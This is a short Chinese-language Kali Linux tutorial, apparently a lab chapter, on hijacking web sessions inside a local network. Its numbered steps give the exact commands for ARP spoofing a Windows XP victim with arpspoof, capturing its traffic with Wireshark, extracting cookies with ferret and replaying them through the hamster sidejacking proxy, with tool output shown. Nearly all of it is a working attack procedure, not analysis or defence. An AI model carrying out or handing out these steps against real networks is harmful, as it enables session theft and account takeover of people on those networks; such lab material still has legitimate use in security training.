kali攻防第3章 內網稱霸之Cookie擷取
內網稱霸之Cookie擷取
準備工具
1、一臺KALI_LINUX系統
2、一臺被攻擊的windows系統
網路環境
Kali系統IP 10.10.10.131
Windows xp IP 10.10.10.129
使用的工具
arpspoof -->欺騙工具
wireshark -->抓包工具
開始執行步驟
1、[email protected]:~# echo "1" > /proc/sys/net/ipv4/ip_forward
2、arpspoof -i eth0 -t 10.10.10.2 10.10.10.129
3、使用wireshark進行抓包
4、受害者10.10.10.129
5、停止抓包工具並儲存抓包資料為pcap格式,儲存名字為cookie
6、使用 ferret工具
如果沒有這個工具請使用命令
ferret沒有64位的
可以安裝32位的
1)新增對32位的支援
dpkg --add-architecture i386
2)更新
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
3)安裝ferret
sudo aptitude install ferret-sidejack:i386
4)ferrer -r cookie.pacp
7、生成hamster.txt檔案,進行架設代理伺服器
[email protected]:~# hamster
--- HAMPSTER 2.0 side-jacking tool ---
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
begining thread
8、開啟10.10.10.131系統中的遊覽器,設定代理服務地址和埠並關閉arp欺騙
9、分析hamster資訊一條一條進行